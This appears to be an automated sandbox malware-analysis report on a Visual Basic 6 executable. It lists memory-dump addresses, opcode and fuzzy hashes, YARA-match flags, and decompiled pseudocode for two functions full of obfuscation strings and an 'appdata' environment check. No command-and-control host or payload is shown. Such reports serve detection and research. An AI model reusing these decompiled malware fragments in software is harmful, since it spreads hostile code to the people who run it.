      0x00401a35
      0x00401a37
      0x00401a39
      0x00401a3b
      0x00401a3d
      0x00401a3f
      0x00401a41
      0x00401a43
      0x00401a43
      0x00401a43
      0x00401a43
      0x00401a47
      0x00401a48
      0x00401a49
      0x00401a4a
      0x00401a4b
      0x00401a4e
      0x00401a4f
      0x00401a50
      0x00401a51
      0x00401a52
      0x00401a53
      0x00401a54
      0x00401a55
      0x00401a56
      0x00401a58
      0x00401a59
      0x00401a5a
      0x00401a5b
      0x00401a5c
      0x00401a5d
      0x00401a5e
      0x00401a5f
      0x00401a60
      0x00401a62
      0x00401a64
      0x00401a65
      0x00401a67
      0x00401a9e
      0x00401aa0
      0x00401aa2
      0x00401aa4
      0x00401aa6
      0x00401aa8
      0x00401aaa
      0x00401aac
      0x00401aae
      0x00401aaf
      0x00401aaf
      0x00401aaf
      0x00401ab1
      0x00401ab1
      0x00401ab3
      0x00401ab6
      0x00401ab6
      0x00401ab8
      0x00401aba
      0x00401aba
      0x00000000
      0x00401aba
      0x00401abe
      0x00401abe
      0x00401ac1
      0x00401abb
      0x00401abb
      0x00401abc
      0x00000000

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: #100
      • String ID: VB5!6&*
      • API String ID: 1341478452-3593831657
      • Opcode ID: f040c468f3a650f91f403cc4ee9c72371284282e98a4de4585c13c0afe7f240b
      • Instruction ID: 3475721fc5de6470c1ed97adcdd5b59bfb3067c989f60441c82283cf71b8c4e5
      • Opcode Fuzzy Hash: f040c468f3a650f91f403cc4ee9c72371284282e98a4de4585c13c0afe7f240b
      • Instruction Fuzzy Hash: 7A31966244E3C14FC3139BB45D756A17FB0AE63214B1A86EBC4D2CF0B3D228995AD367
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Function 021035B4, Relevance: 7.2, Strings: 5, Instructions: 926COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID: .s'*$2Kw$CeF:$K]*$`0K>
      • API String ID: 0-3726629715
      • Opcode ID: 19ccf53a9d9bd5721ea7b374dbc8179a3406875ee4c9611d05c3e87d27945e63
      • Instruction ID: 6deb5bdc1a0eebf7589e98973ca3a8d0073de002aa39e1184c64801f2500d1f0
      • Opcode Fuzzy Hash: 19ccf53a9d9bd5721ea7b374dbc8179a3406875ee4c9611d05c3e87d27945e63
      • Instruction Fuzzy Hash: FB82FD71644388DFDBB49F28CC897EAB7B2FF99300F45811ADD899B654D3709A81CB42
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020F97F8, Relevance: 5.7, Strings: 4, Instructions: 676COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID: .s'*$CeF:$K]*$`0K>
      • API String ID: 0-111459093
      • Opcode ID: 4799e0813bb55671bc4ed2b39148d9b60f209fe171a7eb0f808e0ff2280c7511
      • Instruction ID: efeca4d6c3c326641f93791ddf779498860817714f9e6bed30143c9f1dcc4361
      • Opcode Fuzzy Hash: 4799e0813bb55671bc4ed2b39148d9b60f209fe171a7eb0f808e0ff2280c7511
      • Instruction Fuzzy Hash: AE52C971644388DFDBB49F38CC897EABBB2BF59300F454119DD899B620C7749A81CB46
      Uniqueness

      Uniqueness Score: -1.00%

      Function 02104B64, Relevance: 1.8, Strings: 1, Instructions: 524COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID: I#<
      • API String ID: 0-708874848
      • Opcode ID: a5bd84da16938adeb70bb40c1de00a7e9a62d269bf5d5a3a57cd6496907d7b2a
      • Instruction ID: c08e5eb61b4eb6fa88120c8e15a2a1010134923006ce09ed0b6779acf7009bab
      • Opcode Fuzzy Hash: a5bd84da16938adeb70bb40c1de00a7e9a62d269bf5d5a3a57cd6496907d7b2a
      • Instruction Fuzzy Hash: 4F32E2715483C59FDB35CF38C8D87DA7BA2AF52350F49829AC8998F2D6D7708642CB12
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020F177F, Relevance: .5, Instructions: 475COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2ed3e9950179f91a8c72a7d7195b1cf2a21f7e6a271557adbc560c91bf0bd6d3
      • Instruction ID: 92a1cf7fbf70c16316db63d556b70bed907672e361366fc45cc88c88d18f3098
      • Opcode Fuzzy Hash: 2ed3e9950179f91a8c72a7d7195b1cf2a21f7e6a271557adbc560c91bf0bd6d3
      • Instruction Fuzzy Hash: 5DE158714843D8DFC7E59E79498D0DCFFB2AE01A38B040B4AC77806EF5DB621685E296
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020FE1A3, Relevance: .2, Instructions: 248COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 73c28a497cf21797b4f07ec249e9e2285f31fe85a6557bf2f222c0fb312f484a
      • Instruction ID: 4bee64de085de108ceeb46ad611130fda007bede2edf7ab4274520229b3c5402
      • Opcode Fuzzy Hash: 73c28a497cf21797b4f07ec249e9e2285f31fe85a6557bf2f222c0fb312f484a
      • Instruction Fuzzy Hash: 4CB1E072A84389CFDFB58F64CD44BEE37A6AF48340F45802A9D4DAB654EB305A40DB52
      Uniqueness

      Uniqueness Score: -1.00%

      Function 021048F5, Relevance: .1, Instructions: 67COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: aa3a0165ca200847d89ecf1a9747a8fb5a9e537d99a9691c8f2fb839a7662a05
      • Instruction ID: b841a27b5b9162381ab759885562eef70675204b56a62c72c1b045cf6380564b
      • Opcode Fuzzy Hash: aa3a0165ca200847d89ecf1a9747a8fb5a9e537d99a9691c8f2fb839a7662a05
      • Instruction Fuzzy Hash: C221A138248386CFCB348F6DC9C47E763E1BF5E304F44462D9E998B296D7B09442CA45
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020FD2A9, Relevance: .1, Instructions: 62COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: e7e71d0d10cea6da037869773235a60525c68135e12140410ac654e93e6ba6f0
      • Instruction ID: a555497d97b16e5c50a2c5d84993a07fb48bd6c2d1214facbc2da3734525019b
      • Opcode Fuzzy Hash: e7e71d0d10cea6da037869773235a60525c68135e12140410ac654e93e6ba6f0
      • Instruction Fuzzy Hash: 922123756483448FEBB0CE268D94BCB73F7AFD8210F518619DC4897369D3308943CA22
      Uniqueness

      Uniqueness Score: -1.00%

      Function 02103111, Relevance: .0, Instructions: 41COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 7ff6923824d4881058d691bbe8ccd573632e5f1dcb3fa3ff8f7df79327fb8682
      • Instruction ID: 74e2ff29e9267fe65e110377693aa6e8daf6d5153dbf0064ce8e339d3e26b6ce
      • Opcode Fuzzy Hash: 7ff6923824d4881058d691bbe8ccd573632e5f1dcb3fa3ff8f7df79327fb8682
      • Instruction Fuzzy Hash: 93014075645284DFCB38DF18C9D9A9A77A6EF98700F01449AE8298F354CBB0EE41CB15
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020FCF30, Relevance: .0, Instructions: 6COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
      • Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
      • Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
      • Instruction Fuzzy Hash:
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020FC46B, Relevance: .0, Instructions: 6COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
      • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
      • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
      • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
      Uniqueness

      Uniqueness Score: -1.00%

      Function 021027CD, Relevance: .0, Instructions: 6COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 367bd0f6b658f4fa20800cac3f63872ba025c2dcf76e292e1a9b043242fd9a17
      • Instruction ID: 2edce390d28be958ef57d746efc7ebcb4ea1c61e8edd7d2a7d04915b81eb4a9a
      • Opcode Fuzzy Hash: 367bd0f6b658f4fa20800cac3f63872ba025c2dcf76e292e1a9b043242fd9a17
      • Instruction Fuzzy Hash: 53B0923C2516808FCE45CE08C290F5073B0BB98680F4244D0EC12C7B12C364E800CA00
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00420A6D, Relevance: 82.5, APIs: 38, Strings: 9, Instructions: 225COMMON
      Download Yara Rule
      C-Code - Quality: 57%
      			E00420A6D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a20, void* _a24, void* _a28, signed int* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				signed int _v60;
				void* _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				char* _v136;
				intOrPtr _v144;
				char* _v152;
				char _v160;
				void* _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int _v208;
				short _t125;
				short _t133;
				signed int _t136;
				signed int _t142;
				signed int _t147;
				void* _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t194;

				_t193 = _t192 - 0xc;
				 *[fs:0x0] = _t193;
				L00401540();
				_v16 = _t193;
				_v12 = 0x4014c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t190);
				L004017B6();
				L004017B6();
				L004017B6();
				L004017B6();
				 *_a32 =  *_a32 & 0x00000000;
				_push(0xbe);
				L00401756();
				L0040183A();
				_v88 = 0x19;
				_v96 = 2;
				_v188 = _v60;
				_v60 = _v60 & 0x00000000;
				_v72 = _v188;
				_v80 = 8;
				_push( &_v96);
				_push(0xf9);
				_push( &_v80);
				_push( &_v112);
				L0040168A();
				_v152 = L"monacanthid";
				_v160 = 0x8008;
				_push( &_v112);
				_t125 =  &_v160;
				_push(_t125);
				L00401660();
				_v164 = _t125;
				L00401846();
				_push( &_v112);
				_push( &_v96);
				_push( &_v80);
				_push(3);
				L00401840();
				_t194 = _t193 + 0x10;
				if(_v164 != 0) {
					_push(_v32);
					_push(L"Pollenate4");
					L00401696();
					L0040183A();
					_push(0xa7);
					_push(L"Apokreos");
					L0040162A();
					L0040183A();
					_v192 = _v60;
					_v60 = _v60 & 0x00000000;
					_v72 = _v192;
					_v80 = 8;
					_push(0xea);
					_push( &_v80);
					_push( &_v96);
					L00401624();
					_push( &_v96);
					L00401834();
					L0040183A();
					L00401846();
					_push( &_v96);
					_push( &_v80);
					_push(2);
					L00401840();
					_t194 = _t194 + 0xc;
				}
				_v136 = L"12/12/12";
				_v144 = 8;
				L0040184C();
				_push( &_v80);
				_push( &_v96);
				L004015E8();
				_v152 = 0xc;
				_v160 = 0x8002;
				_push( &_v96);
				_t133 =  &_v160;
				_push(_t133);
				L00401738();
				_v164 = _t133;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L00401840();
				_t136 = _v164;
				if(_t136 != 0) {
					_push(L"Sjkler7");
					_push(L"Antagonistiske");
					_push(L"ADDEDLY");
					_push(L"RESELLS");
					L00401822();
					if( *0x4223c0 != 0) {
						_v200 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a0);
						L004017CE();
						_v200 = 0x4223c0;
					}
					_v164 =  *_v200;
					_t142 =  *((intOrPtr*)( *_v164 + 0x14))(_v164,  &_v64);
					asm("fclex");
					_v168 = _t142;
					if(_v168 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402590);
						_push(_v164);
						_push(_v168);
						L004017C8();
						_v204 = _t142;
					}
					_v172 = _v64;
					_t147 =  *((intOrPtr*)( *_v172 + 0x110))(_v172,  &_v60);
					asm("fclex");
					_v176 = _t147;
					if(_v176 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x4025b0);
						_push(_v172);
						_push(_v176);
						L004017C8();
						_v208 = _t147;
					}
					_t136 = _v60;
					_v196 = _t136;
					_v60 = _v60 & 0x00000000;
					L0040183A();
					L004017C2();
				}
				L004017B6();
				_push(0x420e40);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t136;
			}












































      0x00420a70
      0x00420a7f
      0x00420a8b
      0x00420a93
      0x00420a96
      0x00420a9d
      0x00420aac
      0x00420ab5
      0x00420ac0
      0x00420acb
      0x00420ad6
      0x00420ade
      0x00420ae1
      0x00420ae6
      0x00420af0
      0x00420af5
      0x00420afc
      0x00420b06
      0x00420b0c
      0x00420b16
      0x00420b19
      0x00420b23
      0x00420b24
      0x00420b2c
      0x00420b30
      0x00420b31
      0x00420b36
      0x00420b40
      0x00420b4d
      0x00420b4e
      0x00420b54
      0x00420b55
      0x00420b5a
      0x00420b64
      0x00420b6c
      0x00420b70
      0x00420b74
      0x00420b75
      0x00420b77
      0x00420b7c
      0x00420b88
      0x00420b8e
      0x00420b91
      0x00420b96
      0x00420ba0
      0x00420ba5
      0x00420baa
      0x00420baf
      0x00420bb9
      0x00420bc1
      0x00420bc7
      0x00420bd1
      0x00420bd4
      0x00420bdb
      0x00420be3
      0x00420be7
      0x00420be8
      0x00420bf0
      0x00420bf1
      0x00420bfb
      0x00420c03
      0x00420c0b
      0x00420c0f
      0x00420c10
      0x00420c12
      0x00420c17
      0x00420c17
      0x00420c1a
      0x00420c24
      0x00420c37
      0x00420c3f
      0x00420c43
      0x00420c44
      0x00420c49
      0x00420c53
      0x00420c60
      0x00420c61
      0x00420c67
      0x00420c68
      0x00420c6d
      0x00420c77
      0x00420c7b
      0x00420c7c
      0x00420c7e
      0x00420c86
      0x00420c8f
      0x00420c95
      0x00420c9a
      0x00420c9f
      0x00420ca4
      0x00420ca9
      0x00420cb5
      0x00420cd2
      0x00420cb7
      0x00420cb7
      0x00420cbc
      0x00420cc1
      0x00420cc6
      0x00420cc6
      0x00420ce4
      0x00420cfc
      0x00420cff
      0x00420d01
      0x00420d0e
      0x00420d30
      0x00420d10
      0x00420d10
      0x00420d12
      0x00420d17
      0x00420d1d
      0x00420d23
      0x00420d28
      0x00420d28
      0x00420d3a
      0x00420d52
      0x00420d58
      0x00420d5a
      0x00420d67
      0x00420d8c
      0x00420d69
      0x00420d69
      0x00420d6e
      0x00420d73
      0x00420d79
      0x00420d7f
      0x00420d84
      0x00420d84
      0x00420d93
      0x00420d96
      0x00420d9c
      0x00420da9
      0x00420db1
      0x00420db1
      0x00420dbe
      0x00420dc3
      0x00420e0a
      0x00420e12
      0x00420e1a
      0x00420e22
      0x00420e2a
      0x00420e32
      0x00420e3a
      0x00420e3f

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420A8B
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420AB5
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420AC0
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420ACB
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420AD6
      • #525.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420AE6
      • __vbaStrMove.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420AF0
      • #629.MSVBVM60(?,00000008,000000F9,00000002), ref: 00420B31
      • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00420B55
      • __vbaFreeStr.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00420B64
      • __vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,00008008,?), ref: 00420B77
      • __vbaStrCat.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00420B96
      • __vbaStrMove.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00420BA0
      • #514.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00420BAF
      • __vbaStrMove.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00420BB9
      • #513.MSVBVM60(?,00000008,000000EA), ref: 00420BE8
      • __vbaStrVarMove.MSVBVM60(?,?,00000008,000000EA), ref: 00420BF1
      • __vbaStrMove.MSVBVM60(?,?,00000008,000000EA), ref: 00420BFB
      • __vbaFreeStr.MSVBVM60(?,?,00000008,000000EA), ref: 00420C03
      • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000EA), ref: 00420C12
      • __vbaVarDup.MSVBVM60 ref: 00420C37
      • #542.MSVBVM60(?,?), ref: 00420C44
      • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00420C68
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00420C7E
      • #690.MSVBVM60(RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00420CA9
      • __vbaNew2.MSVBVM60(004025A0,004223C0,RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00420CC1
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 00420D23
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000110), ref: 00420D7F
      • __vbaStrMove.MSVBVM60(00000000,?,004025B0,00000110), ref: 00420DA9
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B0,00000110), ref: 00420DB1
      • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420DBE
      • __vbaFreeStr.MSVBVM60(00420E40,?,?,?,?,?,?,00401546), ref: 00420E0A
      • __vbaFreeStr.MSVBVM60(00420E40,?,?,?,?,?,?,00401546), ref: 00420E12
      • __vbaFreeStr.MSVBVM60(00420E40,?,?,?,?,?,?,00401546), ref: 00420E1A
      • __vbaFreeStr.MSVBVM60(00420E40,?,?,?,?,?,?,00401546), ref: 00420E22
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$Move$Copy$List$CheckHresult$#513#514#525#542#629#690ChkstkNew2
      • String ID: 12/12/12$ADDEDLY$Antagonistiske$Apokreos$DIVARICATE$Pollenate4$RESELLS$Sjkler7$monacanthid
      • API String ID: 3384239285-254499488
      • Opcode ID: fc87b34e61862f3e923425ea6d11f632ca7021f03a237f4211496be39bfb7b82
      • Instruction ID: 9e22c763273cad41d478ff37d2696e063a43a040969f9efb5dc1aae6e23d41ff
      • Opcode Fuzzy Hash: fc87b34e61862f3e923425ea6d11f632ca7021f03a237f4211496be39bfb7b82
      • Instruction Fuzzy Hash: 8EA1E771E01218AFDB10EF91D886BDEB7B8BF04304F5081AAF505B71A1EB785A49CF59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041F40E, Relevance: 68.4, APIs: 32, Strings: 7, Instructions: 196COMMON
      Download Yara Rule
      C-Code - Quality: 53%
      			E0041F40E(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				short _v28;
				short _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				char _v64;
				intOrPtr _v72;
				char _v80;
				char _v96;
				char _v112;
				char* _v136;
				intOrPtr _v144;
				intOrPtr _v168;
				char _v176;
				void* _v180;
				short _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				intOrPtr* _v204;
				signed int _v208;
				signed int _v212;
				signed int _t90;
				char* _t99;
				short _t100;
				char* _t104;
				signed int _t119;
				signed int _t124;
				intOrPtr _t154;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t154;
				L00401540();
				_v12 = _t154;
				_v8 = 0x4013a0;
				_v136 = L"appdata";
				_v144 = 8;
				L0040184C();
				_t90 =  &_v64;
				_push(_t90);
				L00401642();
				L0040183A();
				_push(_t90);
				_push(L"Picry");
				L0040172C();
				asm("sbb eax, eax");
				_v184 =  ~( ~( ~_t90));
				L00401846();
				L00401828();
				if(_v184 != 0) {
					_v136 = L"Langfredagene5";
					_v144 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L004016BA();
					_push( &_v80);
					L00401834();
					L0040183A();
					_push( &_v80);
					_push( &_v64);
					_push(2);
					L00401840();
					_t154 = _t154 + 0xc;
					if( *0x4223c0 != 0) {
						_v204 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a0);
						L004017CE();
						_v204 = 0x4223c0;
					}
					_v184 =  *_v204;
					_t119 =  *((intOrPtr*)( *_v184 + 0x14))(_v184,  &_v48);
					asm("fclex");
					_v188 = _t119;
					if(_v188 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402590);
						_push(_v184);
						_push(_v188);
						L004017C8();
						_v208 = _t119;
					}
					_v192 = _v48;
					_t124 =  *((intOrPtr*)( *_v192 + 0x70))(_v192,  &_v180);
					asm("fclex");
					_v196 = _t124;
					if(_v196 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x4025b0);
						_push(_v192);
						_push(_v196);
						L004017C8();
						_v212 = _t124;
					}
					_v28 = _v180;
					L004017C2();
				}
				_v72 = 0x93;
				_v80 = 2;
				_v136 = L"SUPERSERIOUS";
				_v144 = 8;
				L0040184C();
				_push( &_v80);
				_push(0xb2);
				_push( &_v64);
				_push( &_v96);
				L0040168A();
				_v168 = 0x454add;
				_v176 = 0x8003;
				_push( &_v96);
				_t99 =  &_v112;
				_push(_t99);
				L0040163C();
				_push(_t99);
				_t100 =  &_v176;
				_push(_t100);
				L00401738();
				_v184 = _t100;
				_push( &_v96);
				_push( &_v80);
				_push( &_v64);
				_push(3);
				L00401840();
				_t104 = _v184;
				if(_t104 != 0) {
					_v136 = L"Skovede1";
					_v144 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L00401852();
					_push( &_v80);
					L00401834();
					L0040183A();
					_push( &_v80);
					_t104 =  &_v64;
					_push(_t104);
					_push(2);
					L00401840();
					_push(L"galopbanernes");
					L004017E0();
					_push(_t104);
					L004016B4();
					L0040183A();
				}
				_v32 = 0xd66;
				_push(0x41f753);
				L00401846();
				L00401846();
				L00401846();
				return _t104;
			}




































      0x0041f413
      0x0041f41e
      0x0041f41f
      0x0041f42b
      0x0041f433
      0x0041f436
      0x0041f43d
      0x0041f447
      0x0041f45a
      0x0041f45f
      0x0041f462
      0x0041f463
      0x0041f46d
      0x0041f472
      0x0041f473
      0x0041f478
      0x0041f47f
      0x0041f485
      0x0041f48f
      0x0041f497
      0x0041f4a5
      0x0041f4ab
      0x0041f4b5
      0x0041f4c8
      0x0041f4d0
      0x0041f4d4
      0x0041f4d5
      0x0041f4dd
      0x0041f4de
      0x0041f4e8
      0x0041f4f0
      0x0041f4f4
      0x0041f4f5
      0x0041f4f7
      0x0041f4fc
      0x0041f506
      0x0041f523
      0x0041f508
      0x0041f508
      0x0041f50d
      0x0041f512
      0x0041f517
      0x0041f517
      0x0041f535
      0x0041f54d
      0x0041f550
      0x0041f552
      0x0041f55f
      0x0041f581
      0x0041f561
      0x0041f561
      0x0041f563
      0x0041f568
      0x0041f56e
      0x0041f574
      0x0041f579
      0x0041f579
      0x0041f58b
      0x0041f5a6
      0x0041f5a9
      0x0041f5ab
      0x0041f5b8
      0x0041f5da
      0x0041f5ba
      0x0041f5ba
      0x0041f5bc
      0x0041f5c1
      0x0041f5c7
      0x0041f5cd
      0x0041f5d2
      0x0041f5d2
      0x0041f5e8
      0x0041f5ef
      0x0041f5ef
      0x0041f5f4
      0x0041f5fb
      0x0041f602
      0x0041f60c
      0x0041f61f
      0x0041f627
      0x0041f628
      0x0041f630
      0x0041f634
      0x0041f635
      0x0041f63a
      0x0041f644
      0x0041f651
      0x0041f652
      0x0041f655
      0x0041f656
      0x0041f65b
      0x0041f65c
      0x0041f662
      0x0041f663
      0x0041f668
      0x0041f672
      0x0041f676
      0x0041f67a
      0x0041f67b
      0x0041f67d
      0x0041f685
      0x0041f68e
      0x0041f690
      0x0041f69a
      0x0041f6ad
      0x0041f6b5
      0x0041f6b9
      0x0041f6ba
      0x0041f6c2
      0x0041f6c3
      0x0041f6cd
      0x0041f6d5
      0x0041f6d6
      0x0041f6d9
      0x0041f6da
      0x0041f6dc
      0x0041f6e4
      0x0041f6e9
      0x0041f6ee
      0x0041f6ef
      0x0041f6f9
      0x0041f6f9
      0x0041f6fe
      0x0041f704
      0x0041f73d
      0x0041f745
      0x0041f74d
      0x0041f752

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041F42B
      • __vbaVarDup.MSVBVM60 ref: 0041F45A
      • #667.MSVBVM60(?), ref: 0041F463
      • __vbaStrMove.MSVBVM60(?), ref: 0041F46D
      • __vbaStrCmp.MSVBVM60(Picry,00000000,?), ref: 0041F478
      • __vbaFreeStr.MSVBVM60(Picry,00000000,?), ref: 0041F48F
      • __vbaFreeVar.MSVBVM60(Picry,00000000,?), ref: 0041F497
      • __vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F4C8
      • #518.MSVBVM60(?,?,Picry,00000000,?), ref: 0041F4D5
      • __vbaStrVarMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F4DE
      • __vbaStrMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F4E8
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,Picry,00000000,?), ref: 0041F4F7
      • __vbaNew2.MSVBVM60(004025A0,004223C0), ref: 0041F512
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 0041F574
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000070), ref: 0041F5CD
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B0,00000070), ref: 0041F5EF
      • __vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F61F
      • #629.MSVBVM60(?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F635
      • __vbaLenVar.MSVBVM60(?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F656
      • __vbaVarTstNe.MSVBVM60(?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F663
      • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,?,?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F67D
      • __vbaVarDup.MSVBVM60 ref: 0041F6AD
      • #522.MSVBVM60(?,?), ref: 0041F6BA
      • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041F6C3
